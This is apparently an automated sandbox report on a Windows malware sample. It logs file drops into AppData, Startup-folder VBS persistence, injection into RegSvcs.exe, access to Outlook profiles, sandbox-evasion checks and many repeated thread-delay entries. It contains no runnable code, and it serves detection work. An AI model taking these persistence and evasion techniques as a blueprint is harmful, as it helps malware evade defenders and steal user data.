Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: Binary string: wntdll.pdbUGP source: cunila.exe, 00000002.00000003.2042437840.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000002.00000003.2044375496.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000005.00000003.2177354650.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000005.00000003.2178431472.0000000003D20000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: cunila.exe, 00000002.00000003.2042437840.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000002.00000003.2044375496.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000005.00000003.2177354650.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000005.00000003.2178431472.0000000003D20000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_008842DE
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008A0A76 push ecx; ret 0_2_008A0A89
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00921005 push esi; ret 0_2_0092100E
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00540A76 push ecx; ret 2_2_00540A89
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005C1005 push esi; ret 2_2_005C100E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00E1E79D push ds; iretd 6_2_00E1E73B
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1
Source: C:\Users\user\Desktop\SAL987656700.exe | File created: C:\Users\user\AppData\Local\enterogenous\cunila.exe

Boot Survival

Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_0089F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_0089F98E
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00911C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00911C41
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0053F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 2_2_0053F98E
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005B1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 2_2_005B1C41
Source: C:\Users\user\Desktop\SAL987656700.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match	File source: Process Memory Space: cunila.exe PID: 7164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cunila.exe PID: 1276, type: MEMORYSTR
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1	Host: ip-api.com	Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\Desktop\SAL987656700.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe	API/Special instruction interceptor: Address: 15CA02C
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe	API/Special instruction interceptor: Address: 1327A54
Source: cunila.exe, 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2189912177.0000000002621000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, cunila.exe, 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4471177683.0000000002B51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599866
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599211
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598983
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598657
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598407
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598282
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598157
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598032
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597922
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597813
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596717
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596511
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596063
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593831
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598983
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598091
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595421
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594547
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2663
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7159
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8386
Source: C:\Users\user\Desktop\SAL987656700.exe	API coverage: 3.4 %
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe	API coverage: 3.6 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\SAL987656700.exe	Code function: 0_2_008BC2A2 FindFirstFileExW
Source: C:\Users\user\Desktop\SAL987656700.exe	Code function: 0_2_008F68EE FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\SAL987656700.exe	Code function: 0_2_008F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\SAL987656700.exe	Code function: 0_2_008ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SAL987656700.exe	Code function: 0_2_008ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SAL987656700.exe	Code function: 0_2_008F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SAL987656700.exe	Code function: 0_2_008F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SAL987656700.exe	Code function: 0_2_008EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\SAL987656700.exe	Code function: 0_2_008F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SAL987656700.exe	Code function: 0_2_008F5C97 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe	Code function: 2_2_0055C2A2 FindFirstFileExW
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe	Code function: 2_2_005968EE FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe	Code function: 2_2_0059698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe	Code function: 2_2_0058D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe	Code function: 2_2_0058D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe	Code function: 2_2_00599642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe	Code function: 2_2_0059979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe	Code function: 2_2_00599B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe	Code function: 2_2_0058DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe	Code function: 2_2_00595C97 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SAL987656700.exe	Code function: 0_2_008842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599866
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599211
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598983
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598657
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598407
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598282
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598157
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598032
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597922
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597813
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596717
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596511
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596063
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595828
